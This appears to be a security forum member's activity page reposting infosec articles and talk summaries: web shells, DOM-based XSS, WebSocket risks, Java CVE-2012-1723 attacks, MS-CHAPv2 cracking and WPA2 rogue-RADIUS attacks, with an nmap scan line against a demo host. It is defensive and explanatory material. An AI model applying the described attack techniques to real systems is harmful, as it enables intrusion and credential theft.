Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18715

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro

    gfhgfhgfh

    Nytro posted a topic in Cosul de gunoi

    gfhfghfgh
  2. Nytro
    Terminati ba cu cacaturile astea de parole.
  3. Nytro
    Owasp - Old Webshells, New Tricks With Ryan Kazanciyan, Mandiant Description: The Presentation Web shells _ malicious scripts that provide an attacker with the ability to upload files, execute commands, conduct reconnaissance, and perform other command-and-control activities on a compromised web server _ are nothing new. They've been in the wild ever since the first web server and application exploits reared their ugly heads over a decade ago. Modern application security and server hardening processes have rendered them all but obsolete tools for desperate script-kiddies, right? Wrong. In this presentation we will discuss how web-based backdoors continue to be leveraged by sophisticated, targeted attackers and the challenges that they pose to forensic analysts conducting large-scale investigations. In particular, we will focus on the usage of web shells as a post-exploitation mechanism for maintaining persistence in an environment _ a backup method of remote access _ rather than a tool utilized in the initial entry vector. We will focus on the forensic artifacts that usage of such malware leaves behind on the host and on the network, and discuss techniques for rapidly identifying unknown web-based malware across servers. The Speakers Ryan Kazanciyan Ryan Kazanciyan is a Principal Consultant with Mandiant and has ten years of experience specializing in incident response, forensic analysis, penetration testing, and web application security. He has spent the past four years leading investigation and remediation efforts for highly-targeted attacks affecting organizations in the defense, technology, utilities, government, and financial services sectors. Mr. Kazanciyan has experience with analysis of host and network-based indicators of compromise, disk and memory forensics, and malware identification and triage. He also has an extensive background managing and executing large penetration testing and application security assessments. Mr. Kazanciyan has leveraged his consulting experience to lead training sessions for a variety of audiences in law enforcement, the federal government, and corporate security groups. He has taught courses on incident response, forensic analysis, penetration testing, and web application security. He has also presented at industry and security conferences including Black Hat, DoD CyberCrime, ShmooCon, Infragard, and ISACA. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Old Webshells, New Tricks with Ryan Kazanciyan, Mandiant on Vimeo Sursa: Owasp - Old Webshells, New Tricks With Ryan Kazanciyan, Mandiant
  4. Nytro
    Owasp - Pentesting Smart Grid Web Apps With Justin Searle, Utilisec Description: The Presentation Web applications have not only conquered most user interfaces in traditional IT markets, they are also quickly replacing most user interfaces in critical control systems such as SCADA, Smart Meters, Distribution Management, and other Smart Grid master servers. And if the servers weren't enough, now they are starting to appear in the embedded devices deployed in the field. This talk will discuss all the places where web applications and web services are being used in today's modern electrical grid. We will also discuss the challenges that penetration testers new to critical control systems will face and how they can successfully overcome those challenges. The Speakers Justin Searle Justin Searle is a Managing Partner of UtiliSec, specializing in Smart Grid security architecture design and penetration testing. Justin led the Smart Grid Security Architecture group in the creation of NIST Interagency Report 7628 and currently plays key roles in the Advanced Security Acceleration Project for the Smart Grid (ASAP-SG), National Electric Sector Cybersecurity Organization Resources (NESCOR), and Smart Grid Interoperability Panel (SGIP). Justin has taught courses in hacking techniques, forensics, networking, and intrusion detection for multiple universities, corporations, and security conferences, and is currently an instructor for the SANS Institute. In addition to electric power industry conferences, Justin frequently presents at top security conferences such as Black Hat, DEFCON, OWASP, and AusCERT. Justin co-leads prominent open source projects including the Samurai Web Testing Framework, Middler, Yokoso!, and Laudanum. Justin has an MBA in International Technology and is a CISSP and SANS GIAC certified Incident Handler (GCIH), Intrusion Analyst (GCIA), and Web Application Penetration Tester (GWAPT). Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Pentesting Smart Grid Web Apps with Justin Searle, Utilisec on Vimeo Sursa: Owasp - Pentesting Smart Grid Web Apps With Justin Searle, Utilisec
  5. Nytro
    [h=1]HTML5 WebSockets Identified As Security Risk[/h] [h=3]WebSockets offer the promise of improved TCP connections, but do they also invite new forms of attack on your applications and infrastructure? [/h] By Sean Michael Kerner | July 31, 2012 In the modern world of web development, there are a set of new and emerging specifications sometimes grouped under the moniker HTML5. One of those specifications is the WebSocket API, which enables two-way communications. WebSockets offer the promise of faster communications than traditional TCP -- but according to a pair of security researchers, there is a hidden risk. Speaking at the Black Hat conference last week, Qualys engineers Sergey Shekyan and Vaagn Toukharian detailed how WebSockets could be exploited for malicious gain. Support for WebSockets is currently available in the latest Chrome, Firefox, Safari, and IE 10 web browsers. According to the two researchers, WebSockets are already in use by websites and embedded applications around the world today, and often without proper security. "We think that user capacity may be an issue with WebSockets if it's not implemented in the right way," Toukharian told eSecurity Planet. "WebSockets can be used for lots of things, but they shouldn't be used for all items on a web page." He stressed that WebSockets don't make sense to use in applications that don't need bi-directional communications or a fast response time. Different browsers also support WebSockets in unique ways. In particular, Shekyan noted that there are some important things that are not implemented in WebKit, which is the underlying engine that powers Chrome and Safari. Shekyan explained that the current WebSockets specification states that there should only be one WebSocket in a connecting state at a time. According to Shekyan, WebKit does not implement that specification. "So if a server is not accepting connections fast enough, then you shouldn't try and open a new connection before the previous one was accepted," Shekyan said. "That would prevent DoS (Denial of Service) attacks." According to Shekyan, an attacker could theoretically open an unlimited number of WebSocket connections from a single machine with WebKit to a third party server. Firefox also doesn't quite follow the WebSocket specification and it can allow up to 200 connections. Toukharian added that from a security perspective, WebSockets don't make applications more secure -- but they do provide a new attack vector for hackers. Traditional web attacks like Cross Site Scripting (XSS) and Man in the Middle (MitM) attacks can find a new home in WebSocket traffic. "Basically, if an attacker has access to content that initiates a WebSockets connection, then that connection could be compromised," Shekyan said. The other key issue is that since WebSocket technology is still relatively new, Shekyan argued that most firewall and IPS network security devices are not aware of them. As such, WebSocket traffic is not inspected or secured by the same mechanisms as other web traffic. "If someone can deliver malicious content over WebSockets, the rest of the protection is useless," Shekyan said. "Vendors should really start at looking at handling the WebSockets protocol." The challenge is one of usage. Toukharian added that if there was more use of WebSockets, than it's likely vendors would take more notice. Shekyan noted that he talked with one of the firewall vendors about the risk of not supporting WebSockets. The surprising response that he got back is that WebSockets are not currently a major attack vector and as such it doesn't matter. "Malware delivery via WebSockets becomes easier since IDS and Firewall technology can't see what is being delivered," Toukharian said. "It's just a matter of unmasking the data and looking at the traffic, it's not very hard. "Our hope is that Firewall and IPS vendors pick it up as soon as possible," Toukharian added. Sursa: HTML5 WebSockets Identified As Security Risk - eSecurity Planet
  6. Nytro
    [h=2]Update volatility v2.1 – An advanced memory forensics framework[/h] The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer visibilty into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work into this exciting area of research. What’s new in 2.0 Highlights of this release include: Restructured and depolluted namespace Usage and Development Documentation New Configuration Subsystem New Caching Subsystem New Pluggable address spaces with automated election New Address Spaces (i.e. EWF, Firewire) Updated Object Model and Profile Subsystems (VolatilityMagic) Support for Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7 Updated Scanning Framework Volshell integration Over 40 new plugins! Volatility supports investigations of the following x86 bit memory images: * Microsoft Windows XP Service Pack 2 and 3 * Microsoft Windows 2003 Server Service Pack 0, 1 and 2 * Microsoft Vista Service Pack 0, 1 and 2 * Microsoft 2008 Server Service Pack 1 and 2 (there is no SP 0) * Microsoft Windows 7 Service Pack 0 and 1 Volatility currently provides the following extraction capabilities for memory samples: - Image date and time - Running processes - Open network sockets - Open network connections - DLLs loaded for each process - Open files for each process - Open registry keys for each process - OS kernel modules - Mapping physical offsets to virtual addresses - Virtual Address Descriptor information - Addressable memory for each process - Memory maps for each process - Extract executable samples - Scanning examples: processes, threads, sockets, connections, modules Download Right Here | Read more in here Our Post Before : Volatility v2.0 An advanced memory forensics framework release
  7. Nytro
    Introduction To Reverse Engineering Software Creator: Matt Briggs License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/) Lab Requirements: Windows system with IDA Pro (Free 5.0 is acceptable). Microsoft Visual Studio 2008 redistributable package. Class Textbook: Reversing: Secrets of Reverse Engineering by Eldad Eilam. Recommended Class Duration: 2 days Creator Available to Teach In-Person Classes: Yes Author Comments: Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch, or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day from recreating outdated and incompatible software, understanding malicious code, or exploiting weaknesses in software. In this course we will explore what drives people to reverse engineer software and the methodology and tools used to do it. Topics include, but are not limited to: •Uses for RE •The tricks and pitfalls of analyzing compiled code •Identifying calling conventions •How to navigate x86 assembly using IDA Pro •Identifying Control Flows •Identifying the Win32 API •Using a debugger to aid RE •Dynamic Analysis tools and techniques for RE During the course students will complete many hands on exercises. This class will serve as a prerequisite for a later class on malware analysis. Before taking this class you should take Introduction to Intel x86 or have equivalent knowledge. Class Materials All Material (TiddlyWiki (html+javascript) & analyzed binaries (PE)) To bypass exe filters, e.g. so this can be sent through email, this is an encrypted zip with a password of “reclass2011”. All of the .exe files have been renamed to .ex_. On Mac OS X 10.6 and below, you will have to open the zip file from Terminal in order to get the password prompt. Full quality downloadable QuickTime, h.264, and Ogg videos at Archive.org: Day 1 Part 1 (57:36, 706 MB) Day 1 Part 2 (1:17:18, 1 GB) Day 1 Part 3 (29:49, 453 MB) Day 1 Part 4 (38:36, 530 MB) Day 1 Part 5 (36:06, 500 MB) Day 2 Part 1 (49:29) Day 2 Part 2 (54:58) Day 2 Part 3 (40:09) Day 2 Part 4 (1:10:10) Day 2 Part 5 (58:51) (8:33:02 total, sans lab time) The videos are useful for students, but also more useful for potential instructors who would like to teach this material. By watching the video, you will better understand the intent of some slides which do not stand on their own. You are recommended to watch the largest size video so that the most possible text is visible without having to follow along in the slides. Revision History: 07-08-2012 - Day 2 videos uploaded to YouTube, & both days uploaded to Archive.org 07-01-2012 - Day 1 videos uploaded to YouTube 01-27-2012 - Created some 'missing' content, fixed a few flaws, and added a write-up for the last task 06-16-2011 - Initial class content upload If you have used and modified this material, we would appreciate it if you submit your modified version for publishing here, so that all versions can benefit from your changes. Sursa: IntroductionToReverseEngineering
  8. Nytro
    Portspoof - service signature obfuscator (more pain for port scanners) From: Piotr Duszynski <piotr () duszynski eu> Date: Sun, 05 Aug 2012 09:49:15 +0200 Hi, Short description of the soft and the concept: The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. The general goal of the program is to make the port scanning process very slow and output very difficult to interpret, thus making the attack reconnaissance phase a challenging and bothersome task. More info at: Portspoof - About Note: This is an idea that I had for a long time in mind and finally I found some time to implement it. It is still an early release and some part of the code isn't perfect, but I'll be working on that :] Cheers, Piotrek The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. It is meant to be a lightweight, fast, portable and secure addition to the any firewall system or security infrastructure. The general goal of the program is to make the port scanning software (Nmap/Unicornscan/etc) process slow and output very difficult to interpret, thus making the attack reconnaissance phase a challenging and bothersome task. Here is an example nmap scan result against system running portspoof: - default scan took about 800s (instead of 20s) - CPU usage was at 0,5% - memory usage was at 0,5% - one legitimate service is running on port in range of 1-65535 - all the rest is fake - portspoof will bind only to one port Check portspoof in action (Live demo - will sometimes hang due to dev. process ): nmap -sV 54.247.124.68 Portspoof is still an early work in progress and although stable and working it will require a lot of additional work (preferably along with a good beverage . Sursa: Full Disclosure: Portspoof - service signature obfuscator (more pain for port scanners)
  9. Nytro
    Owasp - Unraveling Some Of The Mysteries Around Dom-Based Xss With Dave Wichers, Aspect Security, Coo Description: Slide : - https://www.owasp.org/images/f/f4/ASDC12-Unraveling_some_of_the_Mysteries_around_DOMbased_X SS.pdf The Presentation DOM-based XSS was first revealed to the world back in 2005 by Amit Klien, when it was an interesting theoretical vulnerability. In 2012, with the push towards Web 2.0 well into the mainstream, DOM-based XSS has become a very commonly uncovered and exploited vulnerability, but it's poorly understood. This talk will focus on the full range of issues around DOM-based XSS. It will start with a discussion of the technical details of the vulnerability, the true nature of the risk it introduces (both likelihood and impact), and some new terminology and updated definitions about what truly is a DOM-based XSS vulnerability as compared to the standard Stored and Reflected XSS that the community is well aware of. It will then discuss the difficulties that security analysts face when trying to find DOM-based XSS flaws, and provide recommended analysis techniques that help move DOM-based XSS discovery from an art towards more of a science. And finally, it will discuss simple techniques for avoiding DOM-based XSS issues in the first place as well as how to mitigate issues that are uncovered during a security review. This talk will include discussion of numerous open source resources that are available on this topic. OWASP has numerous articles on DOM-based XSS, including a definition article DOM_Based_XSS, an OWASP testing guide article Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003), and the DOM_based_XSS_Prevention_Cheat_Sheet, and there are also other open source articles from leading researchers like Stefano Di Paola's Introduction to DOM-Based XSS as well. The speaker has already contributed to all of these OWASP articles and in preparation for this talk, plans to review and contribute additional enhancements to each of these articles in order to make the author's recommendations publically available to the web security community in a very broad manner far beyond just delivering this talk at AppSec DC. The talk will also survey how open source proxy tools like OWASP ZAP and WebScarab, along with Firebug and Chrome's developer tools can be used to track down DOM-based XSS issues within an application. Open source DOM-based XSS detection tools, such as DOMinator, will also be showcased in this talk. This talk was delivered at the conference. The presentation is now available online here. The Speakers Dave Wichers Dave Wichers is a cofounder and the Chief Operating Officer (COO) of Aspect Security, a consulting firm focused exclusively on application security that supports a worldwide clientele with critical applications in the government, defense, financial, healthcare, services and retail sectors. Dave and his team at Aspect Security are founding members of the Open Web Application Security Project (OWASP), and have made major industry contributions including: the OWASP Top Ten, Enterprise Security API (ESAPI), and Application Security Verification Standard (ASVS). He is also a long time contributor to OWASP itself including being a member of the OWASP Board since it was formed in 2003 and established the OWASP conferences program through his role as OWASP Conferences Chair from 2005 through 2009. Dave has over 20 years of experience in the information security field, and has focused exclusively on application security since 1998. At Aspect, in addition to his COO duties, he is Aspect's application security courseware lead, one of their chief instructors, and provides a wide variety of application security consulting services to Aspect's clients. This includes frequent application security verification efforts involving both code review and application penetration testing for both commercial and Government clients. Prior to starting Aspect, he ran the Application Security Services Group at Exodus Communications. Dave has a Bachelors and Masters degree in Computer Science, is a CISSP, and a CISM. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Unraveling some of the Mysteries around DOM-based XSS with Dave Wichers, Aspect Security, COO on Vimeo Sursa: Owasp - Unraveling Some Of The Mysteries Around Dom-Based Xss With Dave Wichers, Aspect Security, Coo
  10. Nytro
    Owasp - Real World Backdoors On Industrial Devices With Ruben Santamarta Ioactive Description: he Presentation The ICS security, or the lack of, has been hogging the titles during the last months. The underlying issue behind this fact is that, in a post-stuxnet era, the industrial control systems are facing a totally new scenario, they are not a safe place anymore but a potential and valuable target. A lot of questions arise, but maybe the most important one is: are they prepared to face this threat? This presentation details the whole process of analyzing industrial devices, including methods such as reverse engineering and open source intelligence. The results of this approach are also elaborated, showing real cases of backdoors found on widely deployed PLCs and SmartMeters The Speakers Ruben Santamarta Ruben Santamarta is a european security researcher specialized in offensive security. Ruben Santamarta works as a security researcher for IOActive. He has discovered dozens of vulnerabilities on products from leading companies such as Microsoft, Apple or Oracle. Ruben is currently focused on the ICS security field, reporting and releasing flaws on industrial software and hardware Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Real World Backdoors on Industrial Devices with Ruben Santamarta IOActive on Vimeo Sursa: Owasp - Real World Backdoors On Industrial Devices With Ruben Santamarta Ioactive
  11. Nytro
    Penetration Testing The Network Using Core Impact Description: In this video the author is introducing CORE IMPACT tool, which is a penetration testing framework used for vulnerable assessments. The entire demonstration of this video describes on the basic usage of the CORE IMPACT tool and its usage method in the vulnerability assessment on the target network. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Penetration Testing The Network Using Core Impact
  12. Nytro
    [h=3]PDF Analysis + A Request[/h][h=2]Sunday, August 05, 2012[/h]I am going to first make my request. Those who know me know I am a bit gaga for photography. One of my pictures was chosen for the exhibition 'London: A Picture of Sustainability'. Please take a second to vote for my photo (if you like it of course!). I was honored to get this far and it would be awesome to be chosen to win! Definitely look at all of them, its neat to see what everyones definition of 'sustainability' is. All the photographs will be available for sale! I am invited to the Exhibition Opening! What do I wear?! Do I need to suit up?! I thought IRs were stressful.... I can't ask you guys for something without giving something in return... so I present not one, but TWO videos on PDF analysis! I will be looking at one PDF via peepdf (the new version) in REMnux and then in PDFStreamDumper. More than one way to peel a potato The file I am using for this demo is 'CVE-2009-4324_PDF_2009-11-30_note200911.pdf=1ST0DAYFILE' which I grabbed from a malicious document collection from Contagio. What would we do without Contagio? UPGRADING TO PEEPDF 0.2 If you already have Peepdf, its quite simple to update. Simply type in: $sudo peepdf.py -u Then everything should be lovely jubbley If not you can go to where you have peepdf installed (in REMNux its in /usr/local/bin) The PDF and run the command direct from there. Ok I lied, you need to do a few more things. You need to also install pylibemu and maybe update libemu while you are at it. Jose recommends using git as the sourceforge packages are outdated. Check the readme for other dependencies you may want. I also was having issues even afte this, peepdf was not seeing my pylibemu library. I noticed when reinstalling everything I did not have python bound to libemu. I did some browsing and this fixed my issue. Thank you Alex from Canada! If you do not have peepdf you can go to the main site directly and download for your system, or you can even find the older version on REMnux (a great free vm for analysing malware) and simply upgrade it youself! PDF STREAM DUMPER I really love this tool as well. I know its' cooler' to use the command line but you know you have to respect a great GUI tool which is amazginly versatile. Again, using the same PDF from peepdf-- I show analysis being done with this windows tool. You can grab the program at the sandsprite website. Thats all for now folks-- please please please vote in the photo comptetition. And a big thank you to Jose for all your assistance with peepdf! If you ever find yourself in London I owe you a beer Sursa: Sketchymoose's Blog: PDF Analysis + A Request
  13. Nytro
    [h=3]Is WPA2 Security Broken Due to Defcon MS-CHAPv2 Cracking?[/h][h=2]Tuesday, July 31, 2012[/h] Quick answer - No. Read on to hear why. A lot of press has been released this week surrounding the cracking of MS-CHAPv2 authentication protocol at Defcon. For example, see these articles from Ars Technica and CloudCracker. All of these articles contain ambiguous and vague references to this hack affecting Wi-Fi networks running WPA2 security. Some articles even call for an end to the use of WPA2 authentication protocols such as PEAP that leverage MS-CHAPv2. But they fail to paint a true and accurate picture of the situation and the impact to Wi-Fi networks. I think this is misleading, and that any recommendations to stop using PEAP are flat-out wrong! So let's clarify things. Is MS-CHAPv2 authentication broken? Answer - Based on what I've read, let's assume it is TOTALLY broken. You can read about the details in those other articles. But for the topic of this post, applicability to Wi-Fi networks, it really doesn't matter if it is broken or not. What is the Impact to Wi-Fi Network Security? Specifically, does this make much of an impact for Wi-Fi networks where 802.1X authentication is employed where MS-CHAPv2 is used (namely EAP-PEAPv0 and EAP-TTLS)? Answer - No, it really does NOT. The impact is essentially zero. Let me explain why. EAP Tunneled Authentication Protocols MS-CHAPv2 is only used in what we call "tunneled authentication protocols," which includes EAP-PEAPv0 and EAP-TTLS. These EAP protocol specifications acknowledge that many insecure and legacy authentication methods need protection and should not be used on their own. They deal with that by wrapping the insecure protocol inside of another, much more secure, TLS tunnel. Hence, these protocols are called "tunneled authentication protocols." This tunneling occurs by relying on asymmetric cryptography through the use of X.509 certificates installed on the RADIUS server, which are sent to the client device to begin connection setup. The client verifies the certificate is valid (more on that in a second), and proceeds to establish a TLS tunnel with the server and begin using symmetric key cryptography for data encryption. Once the TLS tunnel is fully formed, the client and server use the less secure protocol such as MS-CHAPv2 to authenticate the client. This exchange is fully encrypted using the symmetric keys established during tunnel setup. The encryption switches from asymmetric key cryptography to symmetric key cryptography to ease processing and performance, which are much faster this way. This is fundamentally the same method used for HTTPS sessions in a web browser. Here is a reference ladder diagram of PEAP authentication which highlights the different phases of the connection process (outer TLS tunnel setup and inner MS-CHAPv2 authentication). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]PEAP Ladder Diagram (Click for full size image)[/TD] [/TR] [/TABLE] So, MS-CHAPv2 is not used natively for Wi-Fi authentication. We're safe right? Only if implemented properly. Importance of Mutual Authentication The key link in this chain then is the mutual authentication between the RADIUS server and the wireless client. The client must properly validate the RADIUS server certificate first, prior to sending it's credentials to the server. If the client fails to properly validate the server, then it may establish an MS-CHAPv2 session with a fake RADIUS server and send it's credentials along, which could then be cracked using the exploit that was shown at Defcon. This is commonly referred to as a Man-in-the-Middle attack, because the attacker is inserting their RADIUS server in the middle of a conversation between the client and the user database store (typically a directory server). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]RADIUS Server Validation and Exposure to Attack (Click for full size image)[/TD] [/TR] [/TABLE] The RADIUS server is validated as long as the certificate that it sends is trusted. For most client platforms, trusted certificates are provided by the manufacturer for public Certificate Authorities and PKI systems (such as Verisign, Thawte, Entrust, etc.) and are held in the certificate store or keychain on the device. In addition, for corporate environments, administrators can deploy certificates to managed devices in a number of different ways to enable trust for private Certificate Authorities and PKI systems, most common among these methods are Group Policy Objects (GPO) for Microsoft clients and Lion Server Profile Manager or the iPhone Configuration Utility (iPCU) for Apple clients (including OS X and iOS devices). Enabling Server Certificate Validation on Clients In Windows the RADIUS server validation is defined within each SSID profile. If you are looking directly on a Windows 7 workstation, you will want to view the SSID properties, select the Security tab, and go into the PEAP settings. Enable server validation, specify valid server names (which are checked against the Common Name - CN within the server certificate presented to the client), restrict which Root CAs the server certificate can be issued from, and prevent the system from prompting users to accept untrusted certificates (which is important, otherwise they could unknowingly accept a bad certificate and connect to an attacker's RADIUS server). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Windows RADIUS Server Validation[/TD] [/TR] [/TABLE] In Apple devices, including OS X Lion, Mountain Lion, and iOS, use the Lion Server Profile Manger or iPCU to define a configuration profile which includes credentials and a Wi-Fi policy. I'll show the iPCU in this example. First, add the Root CA certificate into the "Credentials" section. Next, define a Wi-Fi policy which specifies the trusted certificates and certificate names allowed. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Apple RADIUS Server Validation[/TD] [/TR] [/TABLE] Client Behavior for Server Validation In both vendor implementations, the behavior of the client device is dictated by what policy has been defined on the system. If no policy for the SSID has been defined or pushed to the client device by an administrator, the default behavior is to prompt the user to validate the certificate. This is likely not ideal, since users typically have a hard time distinguishing what a certificate means and whether or not they should proceed. For example, when an Apple iPhone attempts to join a network when no profile has been deployed for that SSID, the user receives a prompt to accept the connection and proceed: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]iPhone Certificate Prompt[/TD] [/TR] [/TABLE] Therefore, for all corporate 802.1X environments, it is recommended to push profiles for all 802.1X SSIDs that end-users need on their systems. This goes for both production access and BYOD scenarios. The behavior on Windows 7, OS X Lion / Mountain Lion, and iOS devices when a profile has been installed for a specific SSID, is to check the local certificate store or keychain to validate the RADIUS server certificate. It must also match the Root CAs and server names specified in the deployed profile. In the event that an untrusted certificate is presented, all of these systems will NOT prompt the user and the connection is rejected. For example, here is rejected connection by an Apple iPhone for an SSID that has had a profile deployed by an administrator: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]iPhone Certificate Rejection[/TD] [/TR] [/TABLE] Outstanding Vulnerabilities You should still be aware of a few indirectly related vulnerabilities that have not yet been resolved relating to Wi-Fi authentication with 802.1X. First, the default behavior of all systems (especially personal devices) is to prompt users to validate the RADIUS server certificate. This is often confusing and can lead to bad actions being taken by users and attempted authentication through an attacker's RADIUS server. This can be mitigated by having corporate environments deploy configuration profiles for all SSIDs in their network, both production and BYOD. Don't fall into the trap for BYOD of letting users connect on their own and try to decipher the certificate prompt. Establish a sound personal device on-boarding process which deploys a configuration profile to the device upon successful enrollment and policy acceptance. There are numerous ways to do this, ranging from simple solutions such as sending them a profile in an email or providing a web URL where users can download the profile, to more complex solutions such as MDM integration that allow self-registration and zero IT involvement. Second, certificate binding to the SSID is still a manual process on wireless networks. It must be defined within the configuration profile. This is in contrast to SSL and TLS protocols that are used for secure web access where the end-user system can automatically verify if the FQDN within the URL matches the Common Name presented in the certificate. The manual binding process in Wi-Fi networks is born out of a lack of extensibility within the PKI system to handle network access scenarios such as this. A better solution is needed. Finally, certificate revocation checking cannot occur by Wi-Fi clients since they do not yet have a network connection with which they can query a CRL distribution point or use OCSP. This means that client devices cannot check the status of the presented server certificate to see if it has been revoked, which could be caused by valid certificates that have subsequently been compromised or certificates that were invalidly issued by a CA. However, there is hope that the forthcoming 802.11u extensions to Wi-Fi can provide the means for this to occur through message exchanges prior to full network connection (thanks to Christopher Byrd for pointing this out to me during a Twitter conversation). Revolution or Evolution? - Andrew's Take We've known that MS-CHAPv2 is an insecure protocol for a long time. The recent Defcon exploit has just taken that one step further. Development of modern Wi-Fi security recognized the possible value in using legacy protocols such as these. Therefore, EAP protocols that employed such protocols were designed to tunnel the insecure protocol within a much more robust protocol such as TLS. These "tunneled authentication protocols" such as PEAP ensure protection for these insecure protocols through the use of certificates. The onus for proper security then falls on RADIUS server validation to ensure the other end of the connection is trusted before allowing the client authentication to proceed. In a properly implemented wireless network, this MS-CHAPv2 exploit is a non-issue. There is no need for Wi-Fi network administrators to abandon PEAP. Period. Security is a complex field. It may be hard to distinguish the FUD from fact. If you're interested in learning more about Wi-Fi security, then I highly recommend engineers take training provided in the CWSP (Certified Wireless Security Professional) course offered by CWNP, Inc. or the SEC-617 (Wireless Ethical Hacking, Penetration Testing, and Defenses) course offered by the SANS Institute. Cheers, Andrew vonNagy Sursa: Revolution Wi-Fi: Is WPA2 Security Broken Due to Defcon MS-CHAPv2 Cracking?
  14. Nytro
    [h=1]Volume of Malware Targeting Java CVE-2012-1723 Flaw Spikes[/h]by Dennis Fisher It's been nearly two months since Oracle patched the CVE-2012-1723 Java vulnerability, a serious remote pre-authentication flaw that's present in the Jave Runtime Environment. It's taken a little time, but the attacker community has decided that this bug deserves some serious attention, and as a result, attacks trying to exploit it have ramped up significantly in recent weeks. The first malware samples that were exploiting this vulnerability started appearing about a month ago, but it was just in dribs and drabs. But by the second week of July, the number of attacks on CVE-2012-1723 began to take off dramatically. Microsoft researchers compiled statistics that show the volume of malware targeting the Java flaw really took off around July 10, and, with some peaks and valleys in the interim, is still quite high now. The vulnerability itself is in a JRE sub-component called Hotspot and attackers who are able to exploit it will have the ability to execute arbitrary code on the target machine. "The issue is in the optimization performed when a field inside the class is accessed. A static field with a ClassLoader orObject type and bunch of instance-fields with custom data type is a strong indication of exploitation. A bunch of instance-fields are a buffer area where a type-confused object is retrieved," Jeong Wook Oh of the Microsoft Malware Protection Center said in an analysis of the attacks. An oddity with this vulnerability is that attackers don't have the ability to disguise what they're doing with their exploits in this case. Oh said that because attackers need to build a Java class with some specific attributes, it's relatively easy for analysts to see what's going on. "Java-based malware could use a Java-reflection feature to obfuscate vulnerable class and methods loading code when the vulnerability is inside specific class and methods -- for example, CVE-2012-0507 was related toAtomicReferenceArray class. The loading of AtomicReferenceArray class itself can be obfuscated and you can't easily tell whether it is loading the specific class at all just by looking into the Java code. This makes the whole malware analysis process more time-consuming," Oh said. "For this vulnerability, attackers can't obfuscate the core exploit part easily. As we explained with Figure 3, the attackers need to create a class with specific features like static field member with ClassLoader type or Objecttype. And bunch of instance fields follows. It has specific code pieces to run which looks like the code shown in Figure 4. Java doesn't provide ways to obfuscate this class structure itself, so the code pattern stands out. You can easily identify the pattern just by statically investigating the code." Sursa: Volume of Malware Targeting Java CVE-2012-1723 Flaw Spikes | threatpost
  15. Nytro
    [h=1]Hackers Increasingly Look for Cross-Platform Vulnerabilities[/h]By Antone Gonsalves, 2-Aug-2012 [h=2]A Microsoft security researcher says malware makers seek 'economies of scale'.[/h] More and more hackers are targeting the same application vulnerabilities on Macs and Windows PCs as a way to reap the financial benefits of writing cross-platform malware. The trend involves exploiting vulnerabilities that go as far back as 2009 in Office documents. Other cross-platform, third-party technologies favored by hackers include Java, Adobe PDF and Adobe Flash, Microsoft security researcher Methusela Cebrian Ferrer said Tuesday in the company's Malware Protection Center blog. Targeting the same vulnerabilities in applications commonly found on both platforms allows hackers to reap profits twice from the same malware, a trend Ferrer calls "economies of scale in cross-platform vulnerabilities. "This method of distribution allows the attacker to maximize their capability on multiple platforms," he said. Stephen Cobb, security evangelist for ESET, said cybercriminals have treated malware development and methods for infecting systems as a business for years. "We can expect to see further application of business logic -- such as economies of scale, division of labor and risk/reward calculations -- to developments in this space," he said in an interview via email. Although targeted vulnerabilities may have already been patched by vendors, hackers bank on user negligence when it comes to installing software updates. As an example, people are notoriously slow in installing Java patches to Windows PCs and Macs. As much as 60 percent of Java installations are never updated, according to security vendor Rapid7. "All these un-updated applications on the desktop, whatever they may be, are low-hanging fruit," said Jamz Yaneza, research manager for Trend Micro. "These are the easiest things to attack." Microsoft spotted the latest trend while investigating malware called Backdoor Olyx, which the software vendor first spotted a year ago. Subsequent variants since then demonstrated the cross-platform approach taken by malware writers. Backdoor Olyx and its variants are typically downloaded by victims clicking on malicious links or visiting malware-distributing Web sites. The Trojans are also distributed through e-mail attachments. Because the malware attacks known vulnerabilities, the best defense is to keep security software up-to-date and install the latest operating system and third-party security patches. "This best practice should extend to all devices and platforms, especially those in large enterprise networks," Ferrer said. Additional options include uninstalling Java. While the platform is often necessary in servers, its importance has diminished in desktops and laptops with the use of newer Web technologies. To make other software safer, users can run applications in the safest configuration possible, according to Wolfgang Kandek, chief technology officer for Qualys. He noted, for example, that users can turn off Javascript in Adobe Reader as one way to bolster security in that software. Sursa: Computerworld India News | Hackers Increasingly Look for Cross-Platform Vulnerabilities | Computerworld.in
  16. Nytro
